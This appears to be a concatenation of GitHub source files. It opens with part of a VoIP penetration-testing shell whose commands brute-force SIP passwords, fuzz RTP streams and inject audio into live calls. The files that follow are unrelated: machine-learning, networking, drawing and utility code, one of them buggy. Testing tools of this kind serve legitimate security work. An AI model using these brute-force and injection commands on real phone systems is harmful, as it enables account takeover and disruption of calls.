[passwords/1-999999.txt]: \") or \"passwords/1-999999.txt\"\n cmd=f\"sipbrute.py --dst {sipbrute_dstip} --dport {sipbrute_dstport} --proto {sipbrute_proto} --wordlist {sipbrute_wordlist} --src {sipbrute_srcip} --domain {sipbrute_domain}\"\n if sipbrute_proto == \"tls\":\n cmd=f\"sipbrute.py --dst {sipbrute_dstip} --dport {sipbrute_dstport} --proto {sipbrute_proto} --user {sipbrute_user} --wordlist {sipbrute_wordlist} --src {sipbrute_srcip} --domain {sipbrute_domain} --key {sipbrute_key} --crt {sipbrute_crt}\"\n else:\n cmd=f\"sipbrute.py --dst {sipbrute_dstip} --dport {sipbrute_dstport} --proto {sipbrute_proto} --user {sipbrute_user} --wordlist {sipbrute_wordlist} --src {sipbrute_srcip} --domain {sipbrute_domain}\"\n run_tool(tool_folder, cmd)\n\n\n def do_rtpfuzz(self, inp):\n '''A tool for fuzzing an injecting random RTP packets (noise) into running streams'''\n tool_folder=\"RTPFuzz\"\n print(\"A tool for fuzzing an injecting random RTP packets (noise) into running streams\")\n rtpfuzz_dstip=input(\"Enter RTP destination ip address: \")\n rtpfuzz_dstport=input(\"Enter RTP destination port: \")\n rtpfuzz_srcip=input(\"Enter RTP source ip address: \")\n rtpfuzz_srcport=input(\"Enter RTP source port: \")\n rtpfuzz_sseq=input(\"Enter start sequence number [0]: \") or \"0\"\n rtpfuzz_eseq=input(\"Enter end sequence number (amount of packets) [500]: \") or \"500\"\n rtpfuzz_ssrc=input(\"Enter the synchronization source identifier [208851373]: \") or \"208851373\"\n rtpfuzz_type=input(\"Enter payload type. Default is \\\"8\\\", which is PCMA [8]: \") or \"8\"\n rtpfuzz_time=input(\"Enter timestamp [2000000]: \") or \"2000000\" \n cmd=f\"rtpfuzz.py --dst {rtpfuzz_dstip} --dport {rtpfuzz_dstport} --src {rtpfuzz_srcip} --sport {rtpfuzz_srcport} --startseq {rtpfuzz_sseq} --endseq {rtpfuzz_eseq} --ssrc {rtpfuzz_ssrc} --type {rtpfuzz_type} --time {rtpfuzz_time}\"\n run_tool(tool_folder, cmd)\n\n\n def do_rtpaudioinject(self, inp):\n '''A tool for injecting a raw audio file into running streams'''\n tool_folder=\"RTPAudioInjection\"\n print(\"A tool for injecting a raw audio file into running streams\")\n rtpai_dstip=input(\"Enter RTP destination ip address: \")\n rtpai_dstport=input(\"Enter RTP destination port: \")\n rtpai_srcip=input(\"Enter RTP source ip address: \")\n rtpai_srcport=input(\"Enter RTP source port: \")\n rtpai_sseq=input(\"Enter start sequence number [0]: \") or \"0\"\n rtpai_ssrc=input(\"Enter the synchronization source identifier [208851373]: \") or \"208851373\"\n rtpai_type=input(\"Enter payload type. Default is \\\"8\\\", which is PCMA [8]: \") or \"8\"\n rtpai_time=input(\"Enter timestamp [2000000]: \") or \"2000000\"\n rtpai_file=input(\"Enter raw audio file [rickroll.g711a]: \") or \"rickroll.g711a\"\n cmd=f\"rtpaudioinject.py --dst {rtpai_dstip} --dport {rtpai_dstport} --src {rtpai_srcip} --sport {rtpai_srcport} --startseq {rtpai_sseq} --ssrc {rtpai_ssrc} --type {rtpai_type} --time {rtpai_time} --file {rtpai_file}\"\n run_tool(tool_folder, cmd)\n\n\n def do_sipdiscover(self, inp):\n '''A tool to discover SIP services'''\n tool_folder=\"SIPDiscover\"\n print(\"A tool to discover SIP services\")\n sipdiscover_dstip=input(\"Enter the destination SIP server: \")\n sipdiscover_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n sipdiscover_proto=input(\"Enter the protocol , or [udp]: \") or \"udp\"\n if sipdiscover_proto == \"tls\":\n sipdiscover_crt=input(\"Enter the certificate file [crt.crt]: \") or \"crt.crt\"\n sipdiscover_key=input(\"Enter the private key file [key.key]: \") or \"key.key\"\n sipdiscover_srcip=input(\"Enter the source ip address: \")\n sipdiscover_domain=input(\"Enter the SIP domain: \")\n sipdiscover_user=input(\"Enter the SIP username: \")\n if sipdiscover_proto == \"tls\":\n cmd=f\"sipdiscover.py --dst {sipdiscover_dstip} --dport {sipdiscover_dstport} --proto {sipdiscover_proto} --src {sipdiscover_srcip} --domain {sipdiscover_domain} --user {sipdiscover_user} --crt {sipdiscover_crt} --key {sipdiscover_key}\"\n else:\n cmd=f\"sipdiscover.py --dst {sipdiscover_dstip} --dport {sipdiscover_dstport} --proto {sipdiscover_proto} --src {sipdiscover_srcip} --domain {sipdiscover_domain} --user {sipdiscover_user}\"\n run_tool(tool_folder, cmd)\n\n\n def do_exit(self, inp):\n '''Exiting the tool'''\n print(\"Bye\")\n sys.exit(0)\n\n\n def do_clear(self, inp):\n '''Clearing the screen'''\n subprocess.run(\"clear\", shell=False)\n print(logo())\n\n","repo_name":"SySS-Research/WireBug","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":17577,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"67"} +{"seq_id":"2706426757","text":"import collections\n\ndef get_input():\n in_file = open('in22.txt', 'r')\n in_str = in_file.read().replace(' ', ',')\n commands = []\n for line in in_str.split('\\n'):\n sections = line.split(',')\n cmd = sections[0]\n x_axis, numbers = sections[1].split('=')\n x1, x2 = numbers.split('..')\n y_axis, numbers = sections[2].split('=')\n y1, y2 = numbers.split('..')\n z_axis, numbers = sections[3].split('=')\n z1, z2 = numbers.split('..')\n commands.append((cmd, (int(x1), int(x2)), (int(y1), int(y2)), (int(z1), int(z2))))\n in_file.close()\n return commands\n\n\ndef solve_a(commands):\n cube = [[[0 for _ in range(100)] for _ in range(100)] for _ in range(100)]\n for cmd in commands[:20]:\n s = 0\n if cmd[0] == 'on':\n s = 1\n if abs(cmd[1][0]) <= 50:\n for i in range(cmd[1][0], cmd[1][1] + 1):\n for j in range(cmd[2][0], cmd[2][1] + 1):\n for k in range(cmd[3][0], cmd[3][1] + 1):\n cube[i][j][k] = s\n count = 0\n for side in cube:\n for row in side:\n for entry in row:\n if entry:\n count += 1\n return count\n\n\ndef generate_overlap(cuboid, cmd):\n # sign = -1 if cuboid[0] > 0 else 1\n x = (max(cuboid[0][0], cmd[1][0]), min(cuboid[0][1], cmd[1][1]))\n y = (max(cuboid[1][0], cmd[2][0]), min(cuboid[1][1], cmd[2][1]))\n z = (max(cuboid[2][0], cmd[3][0]), min(cuboid[2][1], cmd[3][1]))\n # return (sign*abs((x[1] - x[0] + 1)*(y[1] - y[0] + 1)*(z[1] - z[0] + 1))), x, y, z\n return x, y, z\n\n\ndef cubize(x, y, z):\n return x, y, z\n\ndef volume(x, y, z):\n return abs((x[1] - x[0] + 1)*(y[1] - y[0] + 1)*(z[1] - z[0] + 1))\n\n\ndef solve_b(commands):\n cuboids = collections.Counter()\n for i, cmd in enumerate(commands):\n overlaps = collections.Counter()\n for cuboid, sign in cuboids.items():\n overlap = generate_overlap(cuboid, cmd)\n if overlap[0][0] <= overlap[0][1] and overlap[1][0] <= overlap[1][1] and overlap[2][0] <= overlap[2][1]:\n # if volume(overlap[0], overlap[1], overlap[2]) != 0:\n overlaps[overlap] -= sign\n cb = cmd[1], cmd[2], cmd[3]\n if cmd[0] == 'on':\n cuboids[cb] += 1\n else:\n pass\n # overlaps[cb] -= 1\n cuboids.update(overlaps)\n\n\n print(f'Processed cmd {i}, cuboid list size {len(cuboids)}')\n sum = 0\n for cuboid, sign in cuboids.items():\n sum += volume(cuboid[0], cuboid[1], cuboid[2]) * sign\n return sum\n\n\nif __name__ == '__main__':\n print(solve_b(get_input()))","repo_name":"jaredblack/advent-of-code-2021","sub_path":"day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38136836472","text":"import torch\nimport torch.nn as nn\n\nfrom models import base_model\n\nclass VGG(base_model.HookModule):\n def __init__(self, features, device, name, num_classes=1000):\n super(VGG, self).__init__(device, name)\n self.features = features\n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n self.classifier = nn.Sequential(\n nn.Flatten(start_dim=1),\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = self.avgpool(x)\n x = self.classifier(x)\n return x\n\ndef make_layers(cfg, batch_norm=False):\n layers = []\n in_channels = 3\n for v in cfg:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\n\ncfgs = {\n 'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],\n 'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],\n}\n\n\ndef _vgg(cfg, batch_norm, device, name):\n model = VGG(make_layers(cfgs[cfg], batch_norm=batch_norm), device, name)\n return model\n\n\ndef build_vgg11(device):\n r\"\"\"VGG 11-layer model (configuration \"A\") from\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('A', False, device, 'vgg11').to(device)\n\n\ndef build_vgg11bn(device):\n r\"\"\"VGG 11-layer model (configuration \"A\") with batch normalization\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('A', True, device, 'vgg11bn').to(device)\n\n\ndef build_vgg13(device):\n r\"\"\"VGG 13-layer model (configuration \"B\")\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('B', False, device, 'vgg13').to(device)\n\n\ndef build_vgg13bn(device):\n r\"\"\"VGG 13-layer model (configuration \"B\") with batch normalization\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('B', True, device, 'vgg13bn').to(device)\n\n\ndef build_vgg16(device):\n r\"\"\"VGG 16-layer model (configuration \"D\")\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('D', False, device, 'vgg16').to(device)\n\n\ndef build_vgg16bn(device):\n r\"\"\"VGG 16-layer model (configuration \"D\") with batch normalization\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('D', True, device, 'vgg16bn').to(device)\n\n\ndef build_vgg19(device):\n r\"\"\"VGG 19-layer model (configuration \"E\")\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('E', False, device, 'vgg19').to(device)\n\n\ndef build_vgg19bn(device):\n r\"\"\"VGG 19-layer model (configuration 'E') with batch normalization\n `\"Very Deep Convolutional Networks For Large-Scale Image Recognition\" `_\n \"\"\"\n return _vgg('E', True, device, 'vgg19bn').to(device)\n","repo_name":"qzhong0605/pytorch_lottery","sub_path":"models/imagenet/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40557653548","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport poliglo\n\ndef process(specific_info, data, *args):\n inputs = poliglo.inputs.get_inputs(data, specific_info)\n numbers_file = inputs.get('numbers_filepath')\n with open(numbers_file, 'a') as _file:\n _file.write(\"%s\\n\" % inputs.get('number'))\n return [inputs]\n","repo_name":"dperezrada/poliglo","sub_path":"examples/numbers/workers/write_numbers_to_file.py","file_name":"write_numbers_to_file.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"3661398355","text":"from rubik import *\n\nclass GRE_header(header_t):\n C = bit(1)\n R = bit(1)\n K = bit(1)\n S = bit(1)\n strict_source_route = bit(1)\n recursion_control = bit(3)\n A = bit(1)\n reserved = bit(4)\n version = bit(3)\n protocol = byte(2)\n payload_length = byte(2)\n call_ID = bit(16)\n\nclass GRE_sequence_number(header_t):\n sequence_number = bit(32)\n\nclass GRE_ack_number(header_t):\n ack_number = bit(32)\n\nclass GRE_perm(header_t):\n short_PPP = bit(8)\n\ndef gre_layer(ip):\n gre = connection_oriented()\n gre.header = seq_parse([GRE_header]) + \\\n (if_(GRE_header.S) >> seq_parse([GRE_sequence_number])) + \\\n (if_(GRE_header.A) >> seq_parse([GRE_ack_number]))\n gre.src_meta = [ip.header[\"src_addr\"]]\n gre.dst_meta = [ip.header[\"dst_addr\"]]\n\n gre.perm = auxiliary_data(GRE_perm)\n\n gre.initializing = set_(gre.perm[\"short_PPP\"], 0)\n\n state = [\"dump\"]\n\n gre.psm = psm(state, start_state = \"dump\")\n gre.psm[\"tunneling_p\"] = from_(\"dump\") + to_(\"dump\") + \\\n predict_(gre.to_active and \\\n gre.header[\"payload_length\"] > 0) + \\\n set_(gre.SDU, gre.payload) + \\\n set_(gre.SDU_length, gre.payload_length)\n\n gre.psm[\"tunneling_a\"] = from_(\"dump\") + to_(\"dump\") + \\\n predict_(gre.to_passive and \\\n gre.header[\"payload_length\"] > 0) + \\\n set_(gre.SDU, gre.payload) + \\\n set_(gre.SDU_length, gre.payload_length)\n\n gre.psm[\"only_ack_p\"] = from_(\"dump\") + to_(\"dump\") + \\\n predict_(gre.to_active and \\\n gre.header[\"payload_length\"] == 0)\n\n gre.psm[\"only_ack_a\"] = from_(\"dump\") + to_(\"dump\") + \\\n predict_(gre.to_passive and \\\n gre.header[\"payload_length\"] == 0)\n return gre","repo_name":"GordonWuCn/protocol-independent-network-stack","sub_path":"protocols/GRE.py","file_name":"GRE.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11389001700","text":"import socket\n\nlocalIP = \"140.118.122.155\"\nlocalPort = 5406\n\n# Create a datagram socket\nUDPProxySocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n# Bind to address and ip\nUDPProxySocket.bind((localIP, localPort))\n\nprint(\"UDP Proxy up and listening\")\n\n# Listen for incoming datagrams\nwhile(True):\n proxyMsg , proxyIP = UDPProxySocket.recvfrom(1024)\n\n print(\"Message from Client: \",proxyMsg.decode())\n print(\"Client IP Address: \",proxyIP)\n\n # Sending a msg to server\n UDPProxySocket.sendto(proxyMsg, (\"140.118.122.155\", 5405))","repo_name":"hanklin0804/Applications_of_Wireless_Networking_Systems_in_IoT","sub_path":"UDP_socket/hello1_to_hello10000/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8006862008","text":"from turtle import *\r\nimport math\r\n\r\n# Name your Turtle.\r\nt = Turtle()\r\n\r\n# Set Up your screen and starting position.\r\nsetup(500,300)\r\n\r\n### Write your code below:\r\nbegin_fill('green')\r\ncolor('green')\r\nfor b in range(3):\r\n t.forward(120)\r\n t.right(120)\r\nend_fill('green')\r\n### code from before: pendown()right(60)forward(100)right(60)forward(100)left(60)forward(100)penup()\r\n# Close window on click.\r\nexitonclick()\r\n","repo_name":"syus9522/syus9522.github.io","sub_path":"draw_shapes_triangle.py","file_name":"draw_shapes_triangle.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28951196560","text":"import os\nimport json\nfrom slc.src.utility import Rule\nfrom slc.src.log_module import log\nfrom slc.src.utility import Rule\n\ndef combTables(T1,T2,T1_name,T2_name):\n merged_table={}\n for k1 in T1.keys():\n if(\"drop\" in T1[k1].action or \"stop\" in T1[k1].action):\n merged_table[k1] = Rule._make([T1[k1].active,int(T1[k1].prio),T1[k1].match,T1[k1].action])\n continue\n\n for k2 in T2.keys():\n log.debug(\" Combining: \\n T1[{}]: {} \\n T2[{}]: {} \".format(k1,T1[k1],k2,T2[k2]))\n new_match = combMatch(T1[k1].match,T2[k2].match)\n new_action = combAction(T1[k1].action,T1_name,T2_name,T1_name)\n #print(k1, k2, new_match, new_action)\n \"\"\"print(new_match, new_action)\n for i in range(1000000):\n a = 1\"\"\" \n if(new_action == None):\n continue\n if(len(new_action) > 0):\n new_action += \",\"\n new_action += combAction(T2[k2].action,T1_name,T2_name,T2_name)\n if new_match is not None and new_action is not None:\n m_name = k1+\"_\"+k2\n m_active = []\n m_active.append(T1[k1].active)\n m_active.append(',')\n m_active.append(T2[k2].active)\n m_prio = int(T1[k1].prio)*int(T2[k2].prio)\n\n merged_table[m_name]=Rule._make([''.join(m_active),m_prio,new_match,new_action])\n log.debug(merged_table[m_name])\n\n comres={}\n\n for k in merged_table.keys():\n comres[k] = merged_table[k]._asdict() \n path=\"slc/data/sahiti_data_fw_idps/\"+str(len(T1)-1)+\"/\"\n if not os.path.exists(path):\n os.makedirs(path)\n json.dump(comres,open(path+T1_name+\"_\"+T2_name,'w'),indent=4)\n #print(json.dumps(comres,indent=4))\n return merged_table\n\ndef combAction(a1,T1_name,T2_name,curr_name):\n new_action = []\n for act in a1.split(\",\"):\n if \"drop\" in act:\n new_action.append(act)\n new_action.append(',')\n elif \"send\" not in act:\n act_arr = act.split(\"(\")\n if('-' in act_arr[1]):\n new_action.append(act)\n new_action.append(',')\n else:\n new_action.append(act_arr[0])\n new_action.append('('+curr_name+'-')\n new_action.append(act_arr[1])\n new_action.append(',')\n elif \"send\" in act:\n next = act.split(\"(\")[1].split(\")\")[0]\n if(curr_name == T2_name):\n new_action.append(act)\n new_action.append(',')\n elif (next != T2_name):\n return None\n\n if len(new_action) > 0:\n new_action.pop()\n return ''.join(new_action)\n\n\n\ndef combMatch(ma1,ma2):\n m1 = ma1.split(\",\")\n m2 = ma2.split(\",\")\n wildcard = ['*']\n \"\"\"print(ma1,ma2)\n for i in range(1000000):\n a=1\"\"\"\n if (m1 == wildcard):\n if (m2 == wildcard):\n return '*'\n else:\n return ma2\n elif (m2 == wildcard):\n return ma1\n else:\n d1 = m2d(m1)\n d2 = m2d(m2)\n if (checkClash(d1,d2)):\n return None\n else:\n ma = merge_actions(d1,d2)\n return ma\n\n return None\n\ndef checkClash(d1,d2):\n for k1 in d1.keys():\n if k1 in d2:\n if (k1 == \"src\" or k1 == \"dst\" or k1 == \"port\"):\n if(d1[k1] != d2[k1]):\n return True\n return False\n\ndef merge_actions(d1,d2):\n for k in d2.keys():\n if (k == \"src\" or k == \"dst\" or k == \"port\"):\n if k not in d1:\n d1[k] = d2[k]\n ma = []\n for k, v in d1.items():\n if (k == \"src\" or k == \"dst\" or k == \"port\"):\n ma.append(k)\n ma.append(\"=\")\n ma.append(v)\n ma.append(\",\")\n if \"c\" in d1:\n ma.append(d1[\"c\"])\n ma.append(\",\")\n if \"c\" in d2:\n ma.append(d2[\"c\"])\n ma.append(\",\")\n ma.pop() \n return ''.join(ma)\n\n\n\n\ndef m2d(m):\n d = {}\n for item in m:\n if (item.startswith(\"src\") or item.startswith(\"dst\") or item.startswith(\"port\")):\n if(\"=\" in item):\n item_s = item.split(\"=\")\n d[item_s[0]] = item_s[1]\n else:\n d[\"c\"] = item\n return d\n\n\"\"\"\ndef parseC(s):\n item_s = s.split(\"c\")\n res = []\n res.append(parseInt(item_s[0]))\n res.append(parseInt(item_s[1]))\n print(res)\n for i in range(1000000):\n a=1\n return res\n\ndef parseInt(s):\n i = 0\n for c in s:\n if c.isdigit():\n i *= 10\n i += ord(c)-ord('0')\n print(c,i)\n for x in range(1000000):\n a = 1\n return i\n\"\"\"","repo_name":"b-sahiti/safety_liveness_checker","sub_path":"slc/src/combine_tables.py","file_name":"combine_tables.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26309377145","text":"# coding:utf-8\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import get_user_model\nfrom models import Pets,Adopt,Blog,Comment\nfrom django.utils.safestring import mark_safe\n\nclass HorizRadioRenderer(forms.RadioSelect.renderer): #自訂radio選項redner樣式\n \"\"\" this overrides widget method to put radio buttons horizontally\n instead of vertically.\n \"\"\"\n def render(self):\n \"\"\"Outputs radios\"\"\"\n return mark_safe(u'\\n'.join([u'%s\\n' % w for w in self]))\n\n\nclass UserForm(UserCreationForm):\n name = forms.CharField(label='姓名',max_length=20,required=True)\n facebook = forms.CharField(label='Facebook網址',max_length=100,required=True)\n address = forms.CharField(label='地址',max_length=50,required=True)\n mobile = forms.CharField(label='手機號碼',max_length=10,required=True)\n id_card_num = forms.CharField(label='身份證字號',max_length=10,required=True)\n line = forms.CharField(label='Line ID(非必填)',max_length=20,required=False)\n home_tel = forms.CharField(label='家電(非必填)',max_length=10,required=False)\n photo = forms.ImageField(label='身份證照')\n class Meta:\n model = get_user_model()\n fields = ('username','name','gender','email','id_card_num','address','mobile','home_tel','facebook','line','profile','photo')\n labels = {\n 'username': '帳號',\n 'email': 'E-mail',\n 'gender': '性別',\n 'profile': '個人自述',\n }\n\nclass User_Edit(forms.ModelForm):\n line = forms.CharField(label='Line ID(非必填)',max_length=20,required=False)\n home_tel = forms.CharField(label='家電(非必填)',max_length=10,required=False)\n class Meta():\n model = get_user_model()\n fields = ('email','profile','mobile','home_tel','facebook','line','profile')\n\n'''class Change_User_State(forms.ModelForm):\n class Meta():\n model = get_user_model()\n fields = ('state',)\n'''\n\nclass LoginForm(forms.Form):\n username = forms.CharField(label='帳號',max_length=255, required=True)\n password = forms.CharField(label='密碼',widget=forms.PasswordInput, required=True)\n\nclass Post_Pet(forms.ModelForm):\n photo = forms.ImageField(label='放張寵物照')\n breed = forms.CharField(label='品種(非必填)',max_length=10,required=False)\n class Meta:\n model = Pets\n fields = ('dog_or_cat','pet_name','sex','age','size','color','breed','area','chip','neuter','content','photo')\n labels = {\n 'dog_or_cat':'狗或貓',\n 'pet_name':'寵物的名字',\n 'sex':'寵物性別',\n 'age':'年紀',\n 'size':'體型',\n 'color':'毛色',\n 'area':'地區',\n 'chip':'晶片有無',\n 'neuter':'有無結紮',\n 'content':'寵物介紹一下',\n }\n widgets = {\n 'dog_or_cat': forms.RadioSelect(renderer=HorizRadioRenderer),\n 'chip': forms.RadioSelect(renderer=HorizRadioRenderer),\n 'neuter': forms.RadioSelect(renderer=HorizRadioRenderer),\n }\n\n\nclass Adopt_Request_Form(forms.ModelForm):\n class Meta:\n model = Adopt\n fields = ('content',)\n\n\nclass Blog_Post(forms.ModelForm):\n photo = forms.ImageField(label='上傳照片')\n class Meta:\n model = Blog\n fields = ('title','content','photo')\n labels = {\n 'title':'標題',\n 'content':'內容',\n }\n\n\nclass Comment_Form(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ('credit','comment',)\n labels = {\n 'credit':'給送養者評價',\n 'comment':'寫下你對對方的評語',\n }\n widgets = {\n 'credit': forms.RadioSelect(renderer=HorizRadioRenderer)\n }","repo_name":"littlesheng19/petadopt","sub_path":"Project/pets_adopt/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73826215892","text":"import os\nfrom PIL import Image\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator\n\n# Image utils\ndef read_image(filename, scale=1):\n img = Image.open(os.path.join(filename))\n if scale != 1:\n w, h = img.size\n img = img.resize((int(w * scale), int(h * scale)), Image.BICUBIC)\n img = np.array(img)\n if len(img.shape) == 3:\n img = img[..., :3]\n return img.astype(np.float64) / 255 # only first 3\n\ndef normalize(img):\n return (img - img.min()) / (img.max() - img.min())\n\ndef circle_region(X, Y, r):\n o_x, o_y = X // 2, Y // 2\n x_grid, y_grid = np.meshgrid(np.arange(X), np.arange(Y))\n circ = (((x_grid - o_x)**2 + (y_grid - o_y)**2) < r**2).astype(np.int)\n return circ\n\n# Plotting\ndef plot_2d(X, Y, Z, title):\n fig, ax = plt.subplots()\n heatmap = ax.imshow(Z[::-1], cmap=cm.coolwarm)\n ax.set_title(title)\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_xticks([0, len(X) - 1], np.round(np.array([X[0], X[-1]]), 2))\n ax.set_yticks([0, len(Y) - 1], np.round(np.array([Y[-1], Y[0]]), 2))\n fig.colorbar(heatmap, shrink=0.5, aspect=5)\n plt.show()\n\ndef plot_3d(X, Y, Z, title):\n fig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\n\n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n\n # Customize the z axis.\n ax.zaxis.set_major_locator(LinearLocator(10))\n # A StrMethodFormatter is used automatically\n ax.zaxis.set_major_formatter('{x:.02f}')\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n plt.title(title)\n plt.show()\n","repo_name":"bchao1/poissonpy","sub_path":"poissonpy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"67"} +{"seq_id":"7954904664","text":"from typing import Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport gymnasium as gym\nimport hydra\nimport wandb\nfrom omegaconf import DictConfig, OmegaConf\nfrom stable_baselines3.common import logger as sb3logger\nfrom stable_baselines3.common.logger import configure\n\n# from ..utils import ActionFrameStack\n\n\nclass Tracker:\n @classmethod\n def _cfg_merge(cls, experiment_cfg: DictConfig) -> DictConfig:\n # load a default cfg for this task-env combo, in case the config has changed since the experiment was peformed\n hydra.core.global_hydra.GlobalHydra.instance().clear()\n hydra.initialize(version_base=\"1.2\", config_path=\"config\")\n task_name = (\n experiment_cfg.task.name\n if (experiment_cfg.env.name != \"gym\")\n else experiment_cfg.env.task\n )\n cfg = hydra.compose(\n config_name=\"config.yaml\",\n overrides=[\n f\"env={experiment_cfg.env.name}\",\n f\"task={task_name}\",\n ],\n )\n OmegaConf.update(\n cfg, \"frame_stacking\", experiment_cfg.frame_stacking, force_add=True\n )\n OmegaConf.update(cfg, \"env\", experiment_cfg.env, force_add=True)\n OmegaConf.update(cfg, \"task\", experiment_cfg.task, force_add=True)\n return cfg\n\n def experiment_result(self, run_path: str) -> Tuple[gym.Env, str]:\n # load experiment using the API, returns a generated env and path to .onnx model\n raise NotImplementedError\n\n def save_model(self, model_path: str):\n raise NotImplementedError\n\n def save_video(self, video_path: str, num_timesteps: int):\n raise NotImplementedError\n\n def sb3_logger(self) -> sb3logger.Logger:\n raise NotImplementedError\n\n def finish(self):\n raise NotImplementedError\n\n\nclass LocalTracker(Tracker):\n def __init__(self, cfg: DictConfig, output_dir: str):\n self.output_dir = output_dir\n self.cfg = cfg\n # yaml.dump(OmegaConf.to_container(cfg, resolve=True, throw_on_missing=True), self.output_dir)\n\n def sb3_logger(self) -> sb3logger.Logger:\n return configure(self.output_dir, [\"stdout\", \"csv\", \"tensorboard\"])\n\n def save_model(self, model_path: str):\n pass\n\n def save_video(self, video_path: str, num_timesteps: int):\n pass\n\n def finish(self):\n pass\n\n\nclass WandbWriter(sb3logger.KVWriter, sb3logger.SeqWriter):\n def write_sequence(self, sequence: List) -> None:\n \"\"\"\n write_sequence an array to file\n\n :param sequence:\n \"\"\"\n print(sequence)\n\n def write(\n self,\n key_values: Dict[str, Any],\n key_excluded: Dict[str, Union[str, Tuple[str, ...]]],\n step: int = 0,\n ) -> None:\n \"\"\"\n Write a dictionary to file\n\n :param key_values:\n :param key_excluded:\n :param step:\n \"\"\"\n # print(key_excluded)\n wandb.log(key_values, step=step)\n\n def close(self) -> None:\n \"\"\"\n Close owned resources\n \"\"\"\n # raise NotImplementedError\n pass\n\n\nclass WandbTracker(Tracker):\n def __init__(self, cfg: DictConfig, output_dir: str) -> None:\n # init the tracking connection\n self.cfg = cfg\n task_name = cfg.task.name if (cfg.env.name != \"gym\") else cfg.env.task\n self.run = wandb.init(\n project=f\"{cfg.env.name}-{task_name}\".replace(\" \", \"_\"),\n name=cfg.name,\n config=OmegaConf.to_container(cfg, resolve=True, throw_on_missing=True),\n # sync_tensorboard=True, # auto-upload sb3's tensorboard metrics\n # monitor_gym=True, # auto-upload the videos of agents playing the game\n group=cfg.group,\n save_code=True, # optional\n dir=output_dir,\n )\n self.output_dir = wandb.run.dir\n\n @classmethod\n def experiment_result(cls, run_path: str) -> Tuple[str, DictConfig]:\n # load experiment using the API, returns a path to .onnx model and the original config\n api = wandb.Api()\n run = api.run(run_path)\n experiment_cfg = OmegaConf.create(run.config)\n cfg = cls._cfg_merge(experiment_cfg)\n model_path = f\"onnx_models/{cfg.env.name}/{cfg.task.name}/{run._attrs['name']}\"\n model_name = \"sk8o_actor.onnx\"\n run.file(model_name).download(root=model_path, exist_ok=True)\n return f\"{model_path}/{model_name}\", cfg\n\n @classmethod\n def best_checkpoint(cls, run_path: str) -> str:\n api = wandb.Api()\n run = api.run(run_path)\n experiment_cfg = OmegaConf.create(run.config)\n cfg = cls._cfg_merge(experiment_cfg)\n model_path = (\n 